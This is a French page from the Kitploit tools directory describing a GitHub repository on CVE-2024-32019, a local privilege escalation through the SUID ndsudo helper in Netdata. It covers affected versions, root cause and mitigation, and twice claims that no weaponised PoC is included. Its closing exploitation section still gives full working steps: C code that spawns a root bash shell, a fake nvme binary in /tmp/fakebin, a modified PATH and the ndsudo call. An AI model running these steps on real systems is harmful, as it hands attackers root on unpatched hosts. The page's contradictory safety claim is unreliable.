Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/ayub0x7/cve-2024-32019-poc
Outils DéfensifsEscalade de PrivilègesAnalyse des VulnérabilitésExploitationVirtualisation de SécuritéTests d'Intrusion
GitHubayub0x7/cve-2024-32019-poc

cve-2024-32019-PoC

Vérifie l'exposition à l'élévation de privilèges via le SUID PATH de Netdata ndsudo pour CVE-2024-32019 et valide les correctifs sans exploitation weaponisée.

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-32019 — Élévation de privilèges locale via ndsudo de Netdata

Résumé

L’assistant ndsudo de Netdata (installé setuid root) restreint les commandes qu’il exécute, mais résout ces commandes en utilisant le PATH de l’appelant. Dans les versions affectées, un utilisateur local peut placer un binaire malveillant plus tôt dans le PATH et faire exécuter celui-ci par ndsudo avec les privilèges root. Corrigé dans Netdata 1.45.3 et 1.45.0-169.

Affecté / Corrigé

  • Affecté : >= 1.44.0-60, < 1.45.0-169 et (selon l’avis amont).

>= 1.45.0, < 1.45.3
  • Corrigé : 1.45.3 (stable), 1.45.0-169 (nightly). GitHub

  • Impact

    Élévation de privilèges locale vers root sur les systèmes où ndsudo est installé en SUID et où l’utilisateur peut l’invoquer (souvent les membres du groupe netdata). NVDGitHub

    Cause racine (vue d’ensemble)

    • ndsudo est SUID-root et autorise une liste blanche de sous-commandes comme nvme-list, nvme-smart-log, etc.

    • Il appelle des exécutables externes par leur nom (par exemple nvme), qui sont résolus via le PATH au lieu d’utiliser des chemins absolus ou une recherche sûre et fixe.

    • Si un répertoire inscriptible apparaît avant les chemins système, un attaquant peut introduire un binaire sosie qui sera exécuté en tant que root. GitHub

    Reproduction / Vérification sûre

    Ce dépôt inclut des vérificateurs non-exploit qui :

    • Inspectent /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo (ou son emplacement d’installation) pour vérifier le SUID et le propriétaire.

    • Énumèrent le PATH à la recherche de répertoires inscriptibles placés avant les chemins système courants.

    • Confirment la présence des noms de sous-commandes en liste blanche que ndsudo pourrait tenter d’exécuter.

    • Exécutent éventuellement ndsudo --test <subcommand> pour afficher la commande résolue sans l’exécuter (à utiliser avec prudence, lisez d’abord le code). GitHub

    ⚠️ Aucun PoC weaponisé n’est inclus. Ce projet est destiné aux défenseurs et aux chercheurs pour évaluer l’exposition et valider les correctifs de manière responsable.

    Atténuation

    • Mettre à niveau Netdata vers 1.45.3 (stable) ou 1.45.0-169 (nightly).

    • Comme mesure de défense en profondeur, privilégier les chemins absolus ou un PATH minimal assaini dans les assistants SUID ; éviter d’accorder un accès inutile à ndsudo. GitHubwiz.io

    Étapes d’exploitation

    1. Enregistrez le code C suivant sous nvme.c :
    root@kitploit:~
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    
    int main() {
        setuid(0);
        setgid(0);
        execl("/bin/bash", "bash", NULL);
        return 0;
    }
    
    2. Compiler l’exploit
    root@kitploit:~
    gcc nvme.c - nvme
    
    3. Configuration de l’environnement
    root@kitploit:~
    mkdir -p /tmp/fakebin
    mv nvme /tmp/fakebin/
    chmod +x /tmp/fakebin/nvme
    
    4. Modifier le PATH
    root@kitploit:~
    export PATH=/tmp/fakebin:$PATH
    
    5. Commande d’exploitation
    root@kitploit:~
    /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
    

    Références

    • NVD : CVE-2024-32019. NVD

    • Avis Netdata (GHSA-pmhq-4cxq-wj93). GitHub

    • Résumé Wiz. wiz.io

    • Article Snyk. Vulnerability Guide

    • Liste MITRE/CVE. CVE

    Télécharger l’outil